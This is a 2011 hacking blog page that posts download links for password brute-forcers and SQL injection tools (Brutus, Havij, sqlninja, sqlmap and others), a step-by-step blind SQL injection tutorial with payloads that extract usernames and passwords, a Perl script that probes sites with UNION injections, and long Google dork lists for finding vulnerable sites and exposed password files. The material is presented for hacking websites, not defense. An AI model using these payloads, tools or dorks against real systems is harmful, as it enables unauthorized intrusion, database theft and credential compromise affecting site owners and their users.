Saturday, May 21, 2011

Brutus AET2 Crack Admin & Pass

0 comments


Brutus - Authentication Engine Test Release 2 www.hoobie.net/brutus
28th January 2000


Changes in release AET2 :
1 – All user specified server response strings are converted to lowercase now as are the actual server responses.
2 – Fixed the problem encountered whilst trying to change the timeout during operation.
3 – Fixed problem with the default POP3 settings (related to fix 1 above.)
4 – Added brute force password generation
5 – Added save current session
6 – Added auto-save current session
7 – Added restore saved session
8 – Added save custom service
9 – Added load custom service
10 – Added password permutations
11 – Added word list creation functions
12 – Fixed update problems in the Auth. Seq. Definition window
13 – Added pause/resume functions
14 – Added semi-automatic 'learn' function for HTML form/CGI based services
15 – Added skip user on multiple password prompt failures
16 – Added 'use updated form fields' option to HTML form based services to enable attacks against services which use one time values in HTML form fields.
17 – Created a few example services, Netbus, IMAP, Cisc0 console, Cisc0 enable etc….only tested NetBus.
18 – Completed the 'view authentication sequence' display.
19 - Added SMB authentication for Windows and Samba servers (Only uses API at the moment so is very sloow)
What does it do?
This component of Brutus is capable of authenticating against a wide range of character based application protocols. This is used to facilitate dictionary based user/password attacks against various network applications. This release comes with the following built-in network applications :
HTTP - Basic authentication
HTTP - CGI application authentication (typically used with HTML forms)
FTP
POP3
Telnet
There is also a custom facility which allows you to create your own authentication sequences tailored to your target in addition to being able to modify the built in applications. Using the custom facilty for instance it is possible to authenticate against IMAP, NNTP, IRC or nearly anything that uses plaintext user/password negotiation.
Using the pre-authentication option gives you the ability to perform some quite twisted dictionary attacks, for instance :
You can define an authentication sequence that will connect via some public SOCKS proxy to a UNIX server on 192.168.1.10 offering telnet. Brutus can then log in to the UNIX server and then issue commands such as 'telnet 172.16.10.10', Brutus will then run the dictionary attack against the target at 172.16.10.10. What you have now is a 3 node hop online dictionary attack.
A simpler example of using a pre-authentication sequence might be to have Brutus connect to the target, again a UNIX server running telnet, and perhaps log in as an unprivileged user. It is then possible to have Brutus run a dictionary attack using su in an attempt to obtain the root password. At all times Brutus will maintain the 'conduit' telnet session which improves performance.
Features
· Support for up to 60 simultaneous sessions
· Fully multi-threaded
· Highly customisable authentication sequences
· Single user mode, User List mode, User/Pass combo mode, Password only mode
· Brute force password mode
· Word list creation/generation/processing
· Import/Export custom services
· Load/Save position
· SOCKS support (with optional authentication)
· Capable of 2500+ authentications/second over high speed connections
What is happening?
Brutus is still under development as is this component (the authentication engine). When Brutus is eventually finished, it will be made available, I have no idea when that will be. However, the next release (barring bug-fix releases) will contain my own SMB authentication routines which are much faster than using the WNet API, initially Protocols up to and including LANMAN2 will be available. I am also working on getting SSL support in without using wininet.dll although that may take a bit longer. The next release will be an extension of Brutus AET2 rather than a rewrite.
Issues (which are being worked on)
1 - HTML Form Learning does not recognise the values for SELECT fields with HTML Forms.
2 - Remove Duplicates in word list tools is disabled.
3 - Update cookies is inactive in HTTP POST, the cookies are currently static.
4 - SMB mode will not handle target addresses that are not in UNC format.
5 - In HTTP (FORM/CGI) HTTP status codes such as 302 moved are read but not interpreted.
There are lots more issues...I'll update when I know what they are
Hints
DONT use lots of simultaneous connections unless it's beneficial to do so - Usually slow responding targets (like many POP3 servers which have 10 second + failure notification times) are the best candidates.
There are many variables to take into account, connection speed, authentication notification speed, server capacity, even your machine's capacity in some scenarios. Very often you will find less connections will give you more speed...this is important.
DON'T use the keepalive/stayconnected options if you are having problems - it is usually better to troubleshoot these things in one authentication per connection mode.
DO use keepalive/stay connected options if you can -they can greatly increase speed.
DO use positive authentication responses in your custom sequences - they are usually more reliable.
DO take note of the error indicators in the bottom right of the brutus main window -if they are flashing too often then consider changing some settings.
DO use a network sniffer if you can - to understand and troubleshoot authentication sequences to various services. Also consider using netcat or telnet to 'manually' authenticate against a service to see exactly what the server is responding with and what you need to tell it.
DO create custom using the built in password generator. Using target specific lists in conjunction with perhaps a list of common passwords probably offers you the best chance of positive authentication in a reasonable amount of time.word lists for your specific targets – If the target user(s) is/are known then create user specific wordlists

DOWNLOAD:
***************


Collection Of Some Other SQL Injection Tools

1 comments

MySQL Dump v1

0 comments


*******************************************


*******************************************




DOWNLOAD:
*************

http://www.4shared.com/file/hE105hC1/MySQL_Dump_v1.html

SQL Exploit Scanner

0 comments


Sql Exploit Scanner -V3-
-----------------------------------------------------------------------------

Hi and thanks for downloading my SQL Exploit Scanner V3

First of all I have been working on few updates and few bug fixes for this tool so small apprishiation would be great

============= NEW UPDATE LIST ==================

Updated Both Search Boxes so they both work now and no more error 503
Updated Darkie Search Engine Now you can use blackie instead of just Google
Updated Return List for google
Updated Dorks Search Option so now u can type in "inurl" as dork name so it will look like this
Example.... inurl:page.php?id= instead of just page.php?id=

Tided up the code so you get less Errors
Improved Listings
Made Close Program by app available again ( you don't have to use File> Exit any more )


============= How to use custom Dorks list ====================

when you extract sql exploit scanner V3 you will see a text file named
"MHDorks.txt"
Simply replace contecst of this list with your own, do not rename the file or it will not work




====OLD UPdate List ======

Updated DropDown Box if you using one the other one becomes unusable
Updated Search Function so both Drop Down Boxes work as search and as custom List
Updated Add your own custom dorks list ( simply edit MHDorks.txt with list of your own dorks )
Updated List Return in list box now it auto removes duplicate URL's so you don't have to visit same site twice

----IMPORTENT UPDATE-----
This was what everyone was waiting for
Updated Tool made an add on for SQL Helper 2.7 Cleaned Version ( Means No virus, back door or keylogers )
you can used it with your any AVG enabled and it runs like it should I been testing it on my pc under KAV 2010
and not once my KAV come up with any virus warnings...

---- Removed Functions List ------
Removed Minimise or CLose Box from app it self now you have to click file and exit
there is a reason why I did this in order to sql helper 2.7 work next time this is the way I had to have it exit by option
I'm working on this issue and I houpe I will fix it on my next Update

------ Still Been Developed --------
Feed back given by guys over at HF Boards
Save Settings Function
Other Search Engine function like blackie a.k.a google's old engine


---- Importent Note Please do not try and Edit any files you not supose to I'm sure you will find 1 --------------
---- Please Do not remove any files or app might stop working, and sql helper infected ---------------

Many People been asking me what does this tool do here are some Q and A

Q. WHat does this tool do
A. Look in the Help Section of the Tool it will explain everything

Q. The Tool does not work for me what should I do
A. Few things this could be an issue with.. main one is net frame works you need to go and download that 2.2 server version
another issue might be missing.ocx file go on google and what ever file is telling u it'smissing download and put it in same place as my proggy
and final and most common issue is vista users ( guys remember you need to right click and run as admin ) " Poop Vista "..

DOWNLOAD:
**************

http://www.4shared.com/file/S56uDhuU/V3MoHackzSQLExplt.html

Sql Map Injection Tool

0 comments


“sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.“



This is the change log:

Rewritten SQL injection detection engine (Bernardo and Miroslav).
Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav).
Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Bernardo and Miroslav).
Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
Implemented support for Firebird (Bernardo and Miroslav).
Implemented support for Microsoft Access, Sybase and SAP MaxDB (Miroslav).
Extended old ‘–dump -C‘ functionality to be able to search for specific database(s), table(s) and column(s), –search switch (Bernardo).
Added support to tamper injection data with –tamper switch (Bernardo and Miroslav).
Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack (Miroslav).
Added support to enumerate roles on Oracle, –roles switch (Bernardo).
Added support for SOAP based web services requests (Bernardo).
Added support to fetch unicode data (Bernardo and Miroslav).
Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch (Miroslav).
Implemented several optimization switches to speed up the exploitation of SQL injections (Bernardo and Miroslav).
Support to test and inject against HTTP Referer header (Miroslav).
Implemented HTTP(s) proxy authentication support, –proxy-cred switch (Miroslav).
Implemented feature to speedup the enumeration of table names (Miroslav).
Support for customizable HTTP(s) redirections (Bernardo).
Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, –replicate switch (Miroslav).
Support to parse and test forms on target url, –forms switch (Bernardo and Miroslav).
Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns. Useful for instance when system table ‘information_schema‘ is not available on MySQL (Miroslav).
Basic support for REST-style URL parameters by using the asterisk (*) to mark where to test for and exploit SQL injection (Miroslav).
Added safe URL feature, –safe-url and –safe-freq (Miroslav).
Added –text-only switch to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content (Miroslav).
Implemented few other features and switches (Bernardo and Miroslav).
Over 100 bugs fixed (Bernardo and Miroslav).
Major code refactoring (Bernardo and Miroslav).
User’s manual updated (Bernardo).


DOWNLOAD:
************

Hack Websites With REAL Sql V0.3

0 comments
Hack Websites With REAL Sql


REAL SQL was programmed by me in REALBasic.


What is does is search through Google, using Google Dorks and tries each website for an SQL Injection Vulnerability and if it is successful it will return the vulnerable link to you!


This is the main GUI of the application and in later screenshots I will show you it's features.




Here is the search function and you can see it is returning a vulnerable URL



The search is complete and there were 3 vulnerable URLs found!



This is the save button making a .txt file of all the working links


DOWNLOAD:
*************

http://www.4shared.com/file/Z6GA0IfK/REAL_Sql_-_V03_pass-Logie.html

password - Logie

SQL Injection Helper V2

0 comments

Sqlninja 0.2.3 released

0 comments


Sqlninja 0.2.3 released - Advanced Automated SQL Injectsqlninja 0.2.3 released - Advanced Automated SQL Injection Tool for MS-SQL
Sqlninja is a tool written in PERL to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end. Its main goal is to provide a remote access on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.

Features

* Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, authentication mode)
* Bruteforce of ’sa’ password, both dictionary-based and incremental
* Privilege escalation to ’sa’ if its password has been found
* Creation of a custom xp_cmdshell if the original one has been disabled
* Upload of netcat.exe (or any other executable) using only 100% ASCII GET/POST requests, so no need for FTP connections
* TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
* Direct and reverse bindshell, both TCP and UDP
* DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames
* Evasion techniques, in order to obfuscate the injected code and confuse/bypass signature-based IPS and application firewalls

Fancy going from a SQL Injection to a full GUI access on the DB server? What about extracting password hashes on the fly? Take a few SQL Injection tricks, add a couple of remote shots in the registry to disable Data Execution Prevention, mix with a little Perl that automatically generates a debug script, put all this in a shaker with a Metasploit wrapper, shake well and you have the latest release of sqlninja! See it in action here.

What’s new in 0.2.3?

* A Metasploit3 wrapper, which allows the user to use SQL Injection to execute Metasploit payloads on the remote DB server
* Several other minor improvements

You can download sqlninja 0.2.3 here:


Blind SQL Injection Tool

0 comments


Blind injection tutorial for mysql ,i haven't written a sql tut in awhile so ill add a blind injection tutorial for mysql, the same idea will work in ms-sql with similar commands. Blind injection is a little more complicated/time consuming, but when your injection is multi-select and union isn't possible this is your next best bet. I will go over how to pull version, how to guess table and column names, and finally how to actually pull column data out of the database.Do not try to use a comment (ie: --, or /*) when doing blind injection, its not needed and may makes things worse. There are automating tools for blind injections, I like knowing how blind attacks work so i can do things by hand when needed. I personally use a combination of doing blind injections by hand and by using automating tools to pull the actual content from a column. Pulling data from mysql using blind attack is slow, even when using automating tools, but when no other option is available its still a useful method for sites you really want ;)I will be using an example url http://site.com/news.php?id=12when we visit the url we see a news article with a title of and the article content. We test the injection is subject to a blind attack by going to
CODE
news.php?id=12 and 1=1we should see the same url and contents, then try going to
CODE
news.php?id=12 and 1=2on a successful injection you will see content missing, could be as obvious as the title/article missing or as obscure as maybe the number of pages of the article disappearing. You may have to hit back and forward on your browser to look for differences. If our injection was on a string variable instead of doing news.php?id=12 and 1=1 / news.php?id=12 and 1=2 we would be doing news.php?id=12' and 1='1 / news.php?id=12' and 1='2 this is to keep the syntax error less.For our example lets say just say the title/content of the article disappears when we did 1=2 but was still there when we did 1=1. we can see our input is affecting the mysql returned data. no data is going to match 1=2 so nothing is returned, when the statement is true the content normally being returned from the rest of the sql statement gets returned. So we now string together questions in true/false methods and when the content is displayed on the page we know the question was true, and when its not its false. I will refer to 'page loading normally' as the content is being returned from the mysql database and the statement is TRUE.--Getting mysql @@VERSION--The first question i usually ask is for the version number of mysql, it helps knowing what commands are available as different mysql have different options available.
CODE
news.php?id=12 and substring(@@version,1,1)=4what i did here was get the first character of @@version and compare it to =4, if its TRUE statement we should see the news article otherwise the page will be missing content as like we did 1=2. The page is missing content so i change the 4 to a 5 and try again, this time the page loads normally with the content there so we know were dealing with Mysql5. if 4 and 5 don't work, try 3. If its mysql3 its nearly impossible to get any data out since subselects and union isn't possible making these further commands useless.--Check if we have access to mysql.user--Next i just want to test subselects, sometimes the word "select" is blacklisted.
CODE
news.php?id=12 and (select 1)=1if subselects work you should see the page load normally. Next i want to see if we are an elevated user that has access to mysql.user.
CODE
news.php?id=12 and (SELECT 1 from mysql.user limit 0,1)=1If we have access to mysql.user the query will return 1, if we dont it will error and not return anything. So if the page loads normally here we have access to mysql.user and may be useful to pull mysql hashes later on or try using load_file() and OUTFILE. Also note i used 'limit 0,1', subselects can only return 1 row of data or they will error and fail so don't forget it.--Checking for valid tables--In our example we have mysql5, but pulling data from information_schema is slow in a blind attack so might want to just try guessing a few tables. Or you may be using mysql4 and be required to guess tables/column to get any further.
CODE
news.php?id=12 and (SELECT 1 from users limit 0,1)=1I tried guessing for table users, if there is a table called users it will load normally. Just change the table to guess table names.--Checking for column names within a found table--If you got lucky and guessed some good table names we now can try guessing some columns within those tables. users table has already been found using the above method, dont skip to this step unless you found your tables already.
CODE
news.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1What i did here was merge '1' with the column password, then using substring cut it back down to just the first character which should be 1 if the column password exists. Change the column password to others to try to guess other column names.--Pulling data from found table/columns--Ok this is the actual part of pulling data from those tables and this is were it becomes time consuming, I use automating tools on this part but knowing how to do it by hand makes you a better sql'er =) I'm going to pull username,password column from the table users. I already found username,password,email,userid to be valid columns within the table using the above method.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100ok what i did here was first pull the username/password i want using a where clause, otherwise you could do limit 0,1 to pull the first user out, subselects are limited to 1 row if your subselect will return more then 1 row it will error and this will fail. So its not a bad idea to stick limit 0,1 at the end if your not sure how many rows are going to be returned. then outside of my subselect i have substring(,1,1) this trims my subselect down to just the first character, 1 character in length. Then the ascii() converts that 1 character to an ascii numeric value where i compare it using the greater then symbol > 100.So in the above example, if the ascii char was greater then 100 the page will load normally. In our case the page doesn't load with the content so we know the first char is less then 100, we guess again.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80page loads normally with >80, true. We go higher.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>90false, lower
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>85true, higher
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>86false. We now narrowed it down to be greater then 85 but not greater then 86. So we know our number is 86! You can test by doing =86 if you want to be sure, it may be confusing at first. Using an ascii converter we knows char(86) is 'V', so the first letter of our returned row is 'V', exciting lol. To get the next character we modify the substring.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100I changed the substring ,1,1 to a ,2,1. now it returns the 2nd character of the subselect, 1 character in length. we do the same thing again as the first char. This time >100 returned true so we raise the number.
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>120false, lower the 120
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>110false, lower
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>105false,lower
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>103true, higher
CODE
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>104true, we see that its greater then 104 and NOT greater then 105 making the number we want 105. char(105) is 'i'. So we have 'Vi' so far. As you can see we did 11 requests and only got 2 characters from the database, i actually guessed the number pretty fast it may take a lot more to narrow it down. See how pulling user/password hash can be time consuming. Keep incrementing the substring until you get to the end where >0 will return false.--Automating the pulling of data--I use sqlmap .4, .5 has a few bugs and doesnt always work correctly for me. There are other tools made for blind injection as well. To pull the same username and password in sqlmap you use this command.
CODE
./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(username,0x3a,password) from users where userid=2)"-u is the url your going to inject, -p is the peramiter that is injectable, id. -a will pull a random user-agent from a text otherwise itll use the default sqlmap user-agent, not a good idea. -v1 is verbose. --string is the unique string that appears when the command is TRUE, you find this by doing 1=1 and 1=2 and pasting a small bit of text that only shows when its TRUE. -e is the command you want to evaluate, we want to do a subselect so be sure to add ( ) around your SELECT statement.Doing the above sqlmap command may take 5mins or so to finesh, but beats 30mins or so it would take to do by hand. sqlmap can also get tables/columns if your accessing mysql5, but do you really need the complete table structer. Use -e to do your own commands to only get tables/columns of interest.
CODE
./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(table_schema,0x3a,table_name,0x3a,column_name) from information_schema.columns where column_name like 0x257061737325 limit 0,1)"sqlmap doesn't like handing quotes even if your injection has magicquotes off, so hex. 0x257061737325 is '%pass%' hexed. Now we just run this and increment our limit to get next rows. much faster then using sqlmap to get ALL tables and then trying to figure what tables have what we may be looking for.


Download:
**********



ExploitMyUnion Automate Sql Injection

0 comments


ExploitMyUnion is a tool written in Python with a PyQt user interface made to automate sql injection exploitation.


Features:
Injection via GET/POST/COOKIE.
Quoted injections support.
HTTP proxy support.
SQL 'load_file()' function support.
SQL 'INTO OUTFILE' statement support.
Ability to save/restore injection parameters.
Can dump a table in sql format.


DOWNLOAD:
***************

http://www.4shared.com/file/WNwuV4Zc/exploitmyunion-21_win32.html

Havij--Sql Injection To Find Admin Page to Hack Websites

0 comments


Havij-----Copyright © 2009By r3dm0v3 3dm0v3[4t]yahoo[.]
comPlease tell me your offers and report bugs.Check for updates!
Licence-------
This program is free software. I hope it be useful for you.
This software is provided "as is" without warranties.Feel free to
share and distribute it anywhere but please keep the files original!

What's New?-----------

-Oracle database
-MsAccess database
-Find Admin-Proxy support
-Filtering enabled
-update/delete/insert-Group_concat for mysql
-New look-User agent header
-Load cookie from page-Analyze method made better (specially for mysql)
-Many bugs fixed.

Features-------
-Data Bases: MsSQL 2000/2005 with error, MsSQL 2000/2005 no error,
MySQL, Oracle, MsAccessFind admin pageGetting InformationGetting Tables,
Columns, DataCommand Executation (mssql only)Reading Files
(mysql only)insert/update/delete dataProxy supportGuessing tables and
columns in mysql<5Fast getting tables and columns for mysql.Checking
different injection syntaxes.Changing http headersBypass illegal union.
Avoid using strings.



How To Tag Ur Friend In Facebook Status

0 comments
Just easy three step & u r done...
******************************
Step 1: Start typing your friends name, beginning with a capital letter.

Step 2: Select the friend you want to tag from the drop-down menu.

Step 3: Shorten your friend's name.

Find Admin Page Perl Script

0 comments

*********
Code:
*********

#!/usr/bin/perl
#coded by skillfak3r


#NOTE: U must have the 2 txt files present, urls.txt and wordlist.txt
#its self-explanatory ;)


#input the url in urls.txt like this:
# http://www.somesite.com/galerie3/gal...age.php?pid=-1 union all select 1 from


use LWP::UserAgent;
$xsc = "urls.txt\n";
$source = "wordlist.txt\n";
my $ua = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' );
open(FILE, $source) or die("wtf??Can't open it!\n");
my @tables = ;
close(FILE);

open(FILEZ, $xsc) or die("wtf??Can't open it!\n");
my @urls = ;
close(FILEZ);

foreach $url (@urls) {
$url =~ s/^\s+//;
$url =~ s/\s+$//;

print "TARGET - $url\n\n\n";
foreach $table (@tables) {
$table =~ s/^\s+//;
$table =~ s/\s+$//;
print "TRYING $table - ";
my $response = $ua->get($url . ' ' . $table .'--');
if ($response->is_success) {
if ($response->content =~ m/The used SELECT statements have a different number of columns/gi) {
print "\tOK\n\n";
last;
} else {
print "\tFAILED\n";
next;
}

}
else {
print "FAIL - $response->status_line\n\n";
}
}
}
print "\n\n\n[[DONE]]\n";
$x = <>;


Save this in .pl format....

Useful Dork List For Sql Injection

1 comments

use in google search bar.
***********************

inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurlreview.php?id=
inurl:loadpsb.php?id=
inurlpinions.php?id=
inurl:spr.php?id=
inurlages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurlarticipant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurlrod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurlerson.php?id=
inurlroductinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurlrofile_view.php?id=
inurl:category.php?id=
inurlublications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurlrod_info.php?id=
inurl:shop.php?do=part&id=
inurlroductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurlroduct.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurlroduit.php?id=
inurlop.php?id=
inurl:shopping.php?id=
inurlroductdetail.php?id=
inurlost.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurlage.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurlroduct_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:tran******.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurlpinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurlffer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inur l: info.php?id=
inurl :pro.php?id=

allinurl: \"index php go buy\"
allinurl: \"index.php?go=sell\"
allinurl: \"index php go linkdir\"
allinurl: \"index.php?go=resource_center\"
allinurl: \"resource_center.html\"
allinurl: \"index.php?go=properties\"
allinurl: \"index.php?go=register\"

Search In google:)
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()

inurl:"id=" & intext:"Warning: mysql_fetch_array()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: is_writable()

inurl:"id=" & intext:"Warning: getimagesize()

inurl:"id=" & intext:"Warning: Unknown()

inurl:"id=" & intext:"Warning: session_start()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: pg_exec()

inurl:"id=" & intext:"Warning: mysql_result()

inurl:"id=" & intext:"Warning: mysql_num_rows()

inurl:"id=" & intext:"Warning: mysql_query()

inurl:"id=" & intext:"Warning: array_merge()

inurl:"id=" & intext:"Warning: preg_match()

inurl:"id=" & intext:"Warning: ilesize()

inurl:"id=" & intext:"Warning: filesize()

inurl:"id=" & intext:"Warning: require()



**************************************************************************

admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
Dudirectory" -site:duware.com
dudownload" -site:duware.com
Elite Forum Version *.*"
